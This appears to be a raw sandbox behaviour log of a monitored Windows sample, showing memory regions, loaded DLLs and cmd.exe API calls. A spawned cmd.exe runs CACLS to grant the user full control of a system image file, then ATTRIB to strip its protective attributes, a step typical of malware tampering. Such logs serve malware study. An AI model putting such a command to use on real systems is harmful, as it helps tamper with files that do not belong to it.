"ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 18743 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18744 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18745 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18746 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18747 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18748 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18749 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18750 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18751 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18752 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18753 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18754 start_va = 0x190000 end_va = 0x257fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 18755 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18756 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 279 os_tid = 0xa4c Process: id = "221" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xb3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18757 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18758 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18759 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18760 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 18761 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 18762 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18763 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18764 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18765 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 18766 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18767 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18768 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18769 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18770 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 18771 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 18772 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 18773 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18774 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18775 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18776 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18777 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18778 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18779 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18780 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18781 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 18782 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18783 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 18784 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 18785 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 18786 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 18787 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 18788 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 18789 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 18790 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 18791 start_va = 0x1310000 end_va = 0x15defff entry_point = 0x1310000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 280 os_tid = 0xb04 [0148.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efc84 | out: lpSystemTimeAsFileTime=0x1efc84*(dwLowDateTime=0x9276b9a0, dwHighDateTime=0x1d440a9)) [0148.525] GetCurrentProcessId () returned 0xb3c [0148.525] GetCurrentThreadId () returned 0xb04 [0148.525] GetTickCount () returned 0x2e11a [0148.525] QueryPerformanceCounter (in: lpPerformanceCount=0x1efc7c | out: lpPerformanceCount=0x1efc7c*=20531436486) returned 1 [0148.526] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0148.526] __set_app_type (_Type=0x1) [0148.526] __p__fmode () returned 0x76b331f4 [0148.526] __p__commode () returned 0x76b331fc [0148.526] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0148.526] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0148.526] GetCurrentThreadId () returned 0xb04 [0148.526] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb04) returned 0x38 [0148.527] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0148.527] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0148.527] SetThreadUILanguage (LangId=0x0) returned 0x409 [0148.527] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0148.527] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efc14 | out: phkResult=0x1efc14*=0x0) returned 0x2 [0148.527] VirtualQuery (in: lpAddress=0x1efc4b, lpBuffer=0x1efbe4, dwLength=0x1c | out: lpBuffer=0x1efbe4*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0148.527] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efbe4, dwLength=0x1c | out: lpBuffer=0x1efbe4*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0148.527] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efbe4, dwLength=0x1c | out: lpBuffer=0x1efbe4*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0148.527] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efbe4, dwLength=0x1c | out: lpBuffer=0x1efbe4*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0148.527] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efbe4, dwLength=0x1c | out: lpBuffer=0x1efbe4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0148.527] GetConsoleOutputCP () returned 0x1b5 [0148.527] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0148.528] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0148.528] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.528] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0148.528] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.528] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0148.528] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.528] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0148.528] _get_osfhandle (_FileHandle=0) returned 0x3 [0148.528] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0148.528] _get_osfhandle (_FileHandle=0) returned 0x3 [0148.529] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0148.529] GetEnvironmentStringsW () returned 0x220368* [0148.529] FreeEnvironmentStringsW (penv=0x220368) returned 1 [0148.529] GetEnvironmentStringsW () returned 0x220368* [0148.529] FreeEnvironmentStringsW (penv=0x220368) returned 1 [0148.529] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eeb84 | out: phkResult=0x1eeb84*=0x40) returned 0x0 [0148.529] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x0, lpData=0x1eeb90*=0x18, lpcbData=0x1eeb88*=0x1000) returned 0x2 [0148.529] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x4, lpData=0x1eeb90*=0x1, lpcbData=0x1eeb88*=0x4) returned 0x0 [0148.529] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x0, lpData=0x1eeb90*=0x1, lpcbData=0x1eeb88*=0x1000) returned 0x2 [0148.529] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x4, lpData=0x1eeb90*=0x0, lpcbData=0x1eeb88*=0x4) returned 0x0 [0148.529] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x4, lpData=0x1eeb90*=0x40, lpcbData=0x1eeb88*=0x4) returned 0x0 [0148.529] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x4, lpData=0x1eeb90*=0x40, lpcbData=0x1eeb88*=0x4) returned 0x0 [0148.530] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x0, lpData=0x1eeb90*=0x40, lpcbData=0x1eeb88*=0x1000) returned 0x2 [0148.530] RegCloseKey (hKey=0x40) returned 0x0 [0148.530] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eeb84 | out: phkResult=0x1eeb84*=0x40) returned 0x0 [0148.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x0, lpData=0x1eeb90*=0x40, lpcbData=0x1eeb88*=0x1000) returned 0x2 [0148.530] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x4, lpData=0x1eeb90*=0x1, lpcbData=0x1eeb88*=0x4) returned 0x0 [0148.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x0, lpData=0x1eeb90*=0x1, lpcbData=0x1eeb88*=0x1000) returned 0x2 [0148.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x4, lpData=0x1eeb90*=0x0, lpcbData=0x1eeb88*=0x4) returned 0x0 [0148.530] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x4, lpData=0x1eeb90*=0x9, lpcbData=0x1eeb88*=0x4) returned 0x0 [0148.530] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x4, lpData=0x1eeb90*=0x9, lpcbData=0x1eeb88*=0x4) returned 0x0 [0148.530] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eeb8c, lpData=0x1eeb90, lpcbData=0x1eeb88*=0x1000 | out: lpType=0x1eeb8c*=0x0, lpData=0x1eeb90*=0x9, lpcbData=0x1eeb88*=0x1000) returned 0x2 [0148.530] RegCloseKey (hKey=0x40) returned 0x0 [0148.530] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886377 [0148.530] srand (_Seed=0x5b886377) [0148.530] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\"" [0148.530] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\"" [0148.530] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0148.531] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x221ac8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0148.531] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0148.531] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0148.531] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0148.531] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0148.531] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0148.531] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0148.531] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0148.531] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0148.531] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0148.531] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0148.531] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0148.531] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0148.531] GetEnvironmentStringsW () returned 0x2224b8* [0148.532] FreeEnvironmentStringsW (penv=0x2224b8) returned 1 [0148.532] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.532] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0148.532] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0148.532] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0148.532] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0148.532] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0148.532] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0148.532] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0148.532] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0148.532] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0148.532] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef950 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0148.532] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef950, lpFilePart=0x1ef94c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef94c*="Desktop") returned 0x18 [0148.532] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0148.532] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef6cc | out: lpFindFileData=0x1ef6cc) returned 0x220b48 [0148.532] FindClose (in: hFindFile=0x220b48 | out: hFindFile=0x220b48) returned 1 [0148.532] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef6cc | out: lpFindFileData=0x1ef6cc) returned 0x220b48 [0148.533] FindClose (in: hFindFile=0x220b48 | out: hFindFile=0x220b48) returned 1 [0148.533] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef6cc | out: lpFindFileData=0x1ef6cc) returned 0x220b48 [0148.533] FindClose (in: hFindFile=0x220b48 | out: hFindFile=0x220b48) returned 1 [0148.533] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0148.533] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0148.533] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0148.533] GetEnvironmentStringsW () returned 0x220368* [0148.533] FreeEnvironmentStringsW (penv=0x220368) returned 1 [0148.533] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0148.534] GetConsoleOutputCP () returned 0x1b5 [0148.534] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0148.534] GetUserDefaultLCID () returned 0x409 [0148.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0148.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efa90, cchData=128 | out: lpLCData="0") returned 2 [0148.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efa90, cchData=128 | out: lpLCData="0") returned 2 [0148.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efa90, cchData=128 | out: lpLCData="1") returned 2 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0148.535] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0148.535] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0148.536] GetConsoleTitleW (in: lpConsoleTitle=0x2109f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.536] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0148.536] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0148.536] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0148.536] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0148.537] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0148.538] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0148.538] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0148.538] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0148.538] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0148.538] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 